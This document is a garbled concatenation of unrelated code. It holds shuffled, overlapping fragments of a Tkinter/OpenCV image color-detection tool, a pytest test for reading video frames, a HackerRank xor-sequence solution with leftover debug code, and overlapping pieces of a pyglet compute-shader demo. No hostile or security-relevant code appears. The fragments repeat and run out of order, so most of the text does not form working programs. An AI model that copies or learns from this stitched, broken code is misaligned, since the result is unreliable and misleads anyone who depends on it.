"img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10),",
"files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) # open select2 btn image selectimg2 =",
"# open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1",
"btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if",
"pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum distance from all colors and get",
"str(b) +\" \"+ getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode) #scale text according",
"0 #Reading csv file with pandas and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"]",
"def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg",
"Color name and RGB values ) text = getColorName.cname + ' R='+ str(r)",
"open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 =",
"#resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260)",
"global b,g,r,xpos,ypos, clicked clicked = True xpos = x ypos = y b,g,r",
"column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum distance",
"according to image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800)",
"import filedialog from PIL import ImageTk,Image import pyperclip as pc root = Tk()",
"resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable",
"pandas as pd from tkinter import filedialog from PIL import ImageTk,Image import pyperclip",
"display text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when",
"colours we will display text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break",
"getColorName(R,G,B): minimum = 10000 for i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) +",
"root.filename print(image_path) # open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn",
"#cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will display text in",
"click def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked =",
"resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen",
"clicked clicked = True xpos = x ypos = y b,g,r = img[y,x]",
"clicked = True xpos = x ypos = y b,g,r = img[y,x] b",
"ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select",
"color def getColorName(R,G,B): minimum = 10000 for i in range(len(csv)): d = abs(R-",
"= 10000 for i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+",
"#Reading csv file with pandas and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv",
"thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating text string to",
"and get the most matching color def getColorName(R,G,B): minimum = 10000 for i",
"calculate minimum distance from all colors and get the most matching color def",
"Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img = urlimg.image else : #Reading the",
"the image with opencv img = cv2.imread(image_path) #declaring global variables (are used later",
"+ ' R='+ str(r) + ' G='+ str(g) + ' B='+ str(b) +\"",
"= urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open",
"image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry =",
"= img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours",
"min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1)",
"finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) #",
"my_btn.place(x=100,y=150) # open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image",
"as pd from tkinter import filedialog from PIL import ImageTk,Image import pyperclip as",
"= Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED)",
"pyperclip as pc root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path =",
"image_path == \"\": img = urlimg.image else : #Reading the image with opencv",
"image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open",
"= img[y,x] b = int(b) g = int(g) r = int(r) cv2.namedWindow('Image Color",
"int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to",
"distance from all colors and get the most matching color def getColorName(R,G,B): minimum",
"= abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname",
"variables (are used later on) clicked = False r = g = b",
"root.mainloop() if image_path == \"\": img = urlimg.image else : #Reading the image",
"and RGB values ) text = getColorName.cname + ' R='+ str(r) + '",
"i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum):",
"root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open(): global image_path root.filename",
"g = b = hexcode = xpos = ypos = 0 #Reading csv",
"from all colors and get the most matching color def getColorName(R,G,B): minimum =",
"getColorName.cname + ' R='+ str(r) + ' G='+ str(g) + ' B='+ str(b)",
"cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True xpos = x ypos = y",
"b = int(b) g = int(g) r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image",
"= img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1",
"#declaring global variables (are used later on) clicked = False r = g",
"= filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename",
"pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062')",
"code to clipboard pc.copy(getColorName.hexcode) #scale text according to image size imageWidth = img.shape[0]",
"#Break the loop when User hits 'enter' key if cv2.waitKey(20) & 0xFF ==13:",
"+ ' B='+ str(b) +\" \"+ getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode)",
"resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path ==",
"fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50),",
"+ ' G='+ str(g) + ' B='+ str(b) +\" \"+ getColorName.hexcode #copying color",
"pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) #",
"B='+ str(b) +\" \"+ getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode) #scale text",
"btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path",
"pd from tkinter import filedialog from PIL import ImageTk,Image import pyperclip as pc",
"ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response",
"= Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize",
"= g = b = hexcode = xpos = ypos = 0 #Reading",
"if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True xpos = x",
"= Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img = urlimg.image else : #Reading",
"text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User",
"= int(g) r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image",
"' R='+ str(r) + ' G='+ str(g) + ' B='+ str(b) +\" \"+",
"= Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4,",
"as np import urllib.request import pandas as pd from tkinter import filedialog from",
"minimum distance from all colors and get the most matching color def getColorName(R,G,B):",
"image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) # open select2",
"my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\")",
"we will display text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the",
"root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open():",
"urlimg.image else : #Reading the image with opencv img = cv2.imread(image_path) #declaring global",
"very light colours we will display text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA)",
"colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User hits 'enter' key",
"RGB values ) text = getColorName.cname + ' R='+ str(r) + ' G='+",
"= image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn",
"str(r) + ' G='+ str(g) + ' B='+ str(b) +\" \"+ getColorName.hexcode #copying",
"Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn"
] |
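getColorName scans the CSV row by row with a Manhattan distance in RGB space on every double click. The same lookup can be vectorized with pandas; below is a minimal sketch under the assumption that colors.csv keeps the same six-column layout, and the nearest_color helper name is mine, not from the project.

import pandas as pd

index = ["color", "color_name", "hex", "R", "G", "B"]
df = pd.read_csv('colors.csv', names=index, header=None)  # assumed same layout as above

def nearest_color(r, g, b):
    # Manhattan distance from (r, g, b) to every CSV row at once,
    # then pick the row with the smallest distance.
    d = (df["R"] - r).abs() + (df["G"] - g).abs() + (df["B"] - b).abs()
    row = df.loc[d.idxmin()]
    return row["color_name"], row["hex"]

print(nearest_color(200, 30, 30))

This replaces the Python-level loop over len(csv) rows with a single vectorized pass, which matters once the lookup runs inside an interactive event loop.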
import pytest, logging
from read_video import read_video

def test_read_video():
    test_data = "/Users/pepper/Projekte/PythonProjects/GM_brightness_metric/resources/video/Brosserness_4sec_h264_1920x1080_24fps_2Ch-stereo.mp4"
    #logging.info('ERROR')
    i = 0
    for frame in read_video(test_data):
        logging.info("Output in loop")
        assert frame is not None, "fail"
        i += 1
    assert i > 0
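The test drives read_video as a generator and asserts that at least one non-None frame comes out. The real read_video module is not shown here; the following is a minimal sketch of a generator compatible with the test, assuming OpenCV decoding.

import cv2

def read_video(path):
    # Yield decoded frames one at a time so callers can stream the clip
    # without holding it all in memory.
    cap = cv2.VideoCapture(path)
    try:
        while True:
            ok, frame = cap.read()
            if not ok:
                break
            yield frame
    finally:
        cap.release()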
#!/bin/python3

"""
Xor-sequence
SRC - https://www.hackerrank.com/challenges/xor-se/problem

Sample Input 0:
3
2 4
2 8
5 9

Sample Output 0:
7
9
15
"""

"""
11110 11110 30 - the number
11100 00010  2 - two
11010 11000 24 - the number = the number - 6
11000 00000  0 - zero
10110 10110 22 - the number = the number - 2
10100 00010  2 - two
10010 10000 16 - the number = the number - 6
10000 00000  0 - zero
01110 01110 14 - the number = the number - 2
01100 00010  2 - two
01010 01000  8 - the number = the number - 6
01000 00000  0 - zero
00110 00110  6 - the number = the number - 2
00100 00010  2 - two (answer)
"""

import math
import os
import random
import re
import sys

MAX_BITS = 17

def count_ones(n, bit_id):
    # How many of 0..n have bit `bit_id` set: the bit pattern repeats with
    # period 2**(bit_id + 1), half zeros then half ones.
    ones_in_group = 2**bit_id
    group_size = ones_in_group * 2
    num_groups = (n + 1) // group_size
    ones_in_groups = num_groups * ones_in_group
    rem_ones = 0
    rem = (n + 1) % group_size
    if rem > group_size // 2:
        rem_ones = rem - group_size // 2
    return ones_in_groups + rem_ones

def get_bit_vector_ones_counts(n, max_bit):
    ones_cnts = []
    for i in range(0, max_bit + 1):
        num_ones = count_ones(n, bit_id=i)
        ones_cnts.append(num_ones)
    return ones_cnts

def A_n(n):
    # Prefix xor 1 ^ 2 ^ ... ^ n: a bit survives iff it is set an odd
    # number of times among 0..n.
    n_bits = get_bit_vector_ones_counts(n, max_bit=MAX_BITS)
    result = 0
    for i, num_ones in enumerate(n_bits):
        if num_ones % 2 != 0:
            result += 2**i
    return result

def xor_sequence(l, r):
    l_bits = get_bit_vector_ones_counts(l - 1, max_bit=MAX_BITS)
    r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS)
    result = 0
    for i, (l, r) in enumerate(zip(l_bits, r_bits)):
        if (r - l) % 2 != 0:
            result += 2**i
    return result

def xor_sequence_2(l, r):
    result = 0
    for i in range(l + 1, r + 1, 2):
        result ^= i
    if (r - l + 1) % 2 != 0:
        return A_n(r) ^ result
    return result

def xor_sequence_3(l, r):
    l_bits = get_bit_vector_ones_counts(l + 1, max_bit=MAX_BITS)
    r_bits = get_bit_vector_ones_counts(r, max_bit=MAX_BITS)
    result = 0
    for i, (l, r) in enumerate(zip(l_bits, r_bits)):
        l //= 2
        r //= 2
        if (r - l) % 2 != 0:
            result += 2**i
    return result

if __name__ == '__main__':
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    q = int(input())

    # Exploration trace: prints the running xor pattern in binary.
    l, r = 2, 31
    a_l = format(A_n(l), '04b')
    a_r = format(A_n(r), '04b')
    s = 0
    for j in range(r, l, -2):
        s ^= j
        jf = format(j, '05b')
        sf = format(s, '05b')
        print(j, jf, sf, s)
    if (l - r + 1) % 2 != 0:
        al = A_n(l)
        s ^= al
        print(j, jf, sf, s)

    for q_itr in range(q):
        lr = input().split()
        l = int(lr[0])
        r = int(lr[1])
        result = xor_sequence_3(l, r)
        fptr.write(str(result) + '\n')

    fptr.close()
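A_n(n) builds the prefix xor 1 ^ 2 ^ ... ^ n by counting set bits per position and keeping the positions with odd counts. That agrees with the well-known mod-4 closed form for the prefix xor, which makes a handy cross-check; the check below is mine, not part of the submitted solution.

def prefix_xor_closed_form(n):
    # xor of 1..n repeats with period 4: n, 1, n + 1, 0.
    m = n % 4
    if m == 0:
        return n
    if m == 1:
        return 1
    if m == 2:
        return n + 1
    return 0  # m == 3

for n in range(1, 4096):
    assert A_n(n) == prefix_xor_closed_form(n)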
[
"+ uint2(quad.x, quad.y)] = float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x",
"tid : SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0, 1); } \"\"\"), uav=[target])",
"compushady.shaders import hlsl if platform.system() != 'Windows': raise Exception('only Windows is supported for",
"Quad { uint x; uint y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target",
"import ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats import",
"{ target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer],",
"HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl",
"example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height,",
"Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint y; };",
"uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad { uint x;",
"\"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad { uint",
"[numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0, 1);",
"= 0 if y > window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event",
"0 def update(dt): global x, y x += 1 y += 1 if",
"def on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8, 1) quad.dispatch(1, 1, 1) swapchain.present(target)",
"+= 1 y += 1 if x > window.width: x = 0 if",
"quad.y)] = float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0",
"import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import",
"x = 0 y = 0 def update(dt): global x, y x +=",
"this example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width,",
"0 y = 0 def update(dt): global x, y x += 1 y",
"compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system() != 'Windows': raise Exception('only",
"on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8, 1) quad.dispatch(1, 1, 1) swapchain.present(target) pyglet.clock.schedule_interval(update,",
"1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y = 0 def update(dt):",
"pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen =",
"x += 1 y += 1 if x > window.width: x = 0",
"struct from ctypes import addressof,pointer import ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute,",
"swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\"",
"Exception('only Windows is supported for this example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd,",
"// 8, window.height // 8, 1) quad.dispatch(1, 1, 1) swapchain.present(target) pyglet.clock.schedule_interval(update, 1/120.0) pyglet.app.run()",
"B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid :",
"from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system() != 'Windows': raise",
"> window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width //",
"tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1, 1, 1);",
"Swapchain, Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl if",
"} \"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y = 0 def update(dt): global",
"uint2(quad.x, quad.y)] = float4(0, 1, 1, 1); } \"\"\"), cbv=[constant_buffer], uav=[target]) x =",
"= Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint y;",
"SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0, 1); } \"\"\"), uav=[target]) constant_buffer =",
"= float4(1, 0, 0, 1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad",
"import struct from ctypes import addressof,pointer import ctypes from compushady import HEAP_UPLOAD, Swapchain,",
"!= 'Windows': raise Exception('only Windows is supported for this example') window = pyglet.window.Window()",
"import pyglet import platform import struct from ctypes import addressof,pointer import ctypes from",
"0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8,",
"= Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4>",
"import addressof,pointer import ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from",
"hlsl if platform.system() != 'Windows': raise Exception('only Windows is supported for this example')",
"target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x,",
"ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM",
"uint y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void",
"Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint y; }; ConstantBuffer<Quad> quad : register(b0);",
"import B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system() != 'Windows': raise Exception('only Windows",
"target[tid.xy] = float4(1, 0, 0, 1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD)",
"y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3",
"1 if x > window.width: x = 0 if y > window.height: y",
"constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint",
"x = 0 if y > window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y))",
"+= 1 if x > window.width: x = 0 if y > window.height:",
"if y > window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw():",
"y > window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width",
"Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders import hlsl if platform.system() !=",
"from ctypes import addressof,pointer import ctypes from compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D,",
"if platform.system() != 'Windows': raise Exception('only Windows is supported for this example') window",
": register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) {",
"1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad",
"= Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) {",
"RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] =",
"target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] = float4(1,",
"register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0,",
"register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] =",
"import platform import struct from ctypes import addressof,pointer import ctypes from compushady import",
"B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target :",
"0, 1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct",
"HEAP_UPLOAD) quad = Compute(hlsl.compile(\"\"\" struct Quad { uint x; uint y; }; ConstantBuffer<Quad>",
"ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid :",
"SV_DispatchThreadID) { target[tid.xy + uint2(quad.x, quad.y)] = float4(0, 1, 1, 1); } \"\"\"),",
"uav=[target]) x = 0 y = 0 def update(dt): global x, y x",
"def update(dt): global x, y x += 1 y += 1 if x",
"0 if y > window.height: y = 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def",
"cbv=[constant_buffer], uav=[target]) x = 0 y = 0 def update(dt): global x, y",
"'Windows': raise Exception('only Windows is supported for this example') window = pyglet.window.Window() swapchain",
"register(b0); RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy",
"void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] = float4(1, 0, 0, 1); }",
"{ uint x; uint y; }; ConstantBuffer<Quad> quad : register(b0); RWTexture2D<float4> target :",
"import hlsl if platform.system() != 'Windows': raise Exception('only Windows is supported for this",
"compushady import HEAP_UPLOAD, Swapchain, Compute, Texture2D, Buffer from compushady.formats import B8G8R8A8_UNORM from compushady.shaders",
"= pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target = Texture2D(window.width, window.height, B8G8R8A8_UNORM) clear_screen",
"clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID)",
"\"\"\"), cbv=[constant_buffer], uav=[target]) x = 0 y = 0 def update(dt): global x,",
"if x > window.width: x = 0 if y > window.height: y =",
"@window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8, 1) quad.dispatch(1, 1, 1)",
"y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height // 8, 1) quad.dispatch(1, 1,",
"RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy +",
"Windows is supported for this example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM,",
": register(u0); [numthreads(8,8,1)] void main(uint3 tid : SV_DispatchThreadID) { target[tid.xy] = float4(1, 0,",
"window.height, B8G8R8A8_UNORM) clear_screen = Compute(hlsl.compile(\"\"\" RWTexture2D<float4> target : register(u0); [numthreads(8,8,1)] void main(uint3 tid",
"= 0 constant_buffer.upload(struct.pack('II', x, y)) @window.event def on_draw(): clear_screen.dispatch(window.width // 8, window.height //",
"for this example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target =",
"supported for this example') window = pyglet.window.Window() swapchain = Swapchain(window._hwnd, B8G8R8A8_UNORM, 3) target",
"float4(1, 0, 0, 1); } \"\"\"), uav=[target]) constant_buffer = Buffer(8, HEAP_UPLOAD) quad =",
"from compushady.shaders import hlsl if platform.system() != 'Windows': raise Exception('only Windows is supported",
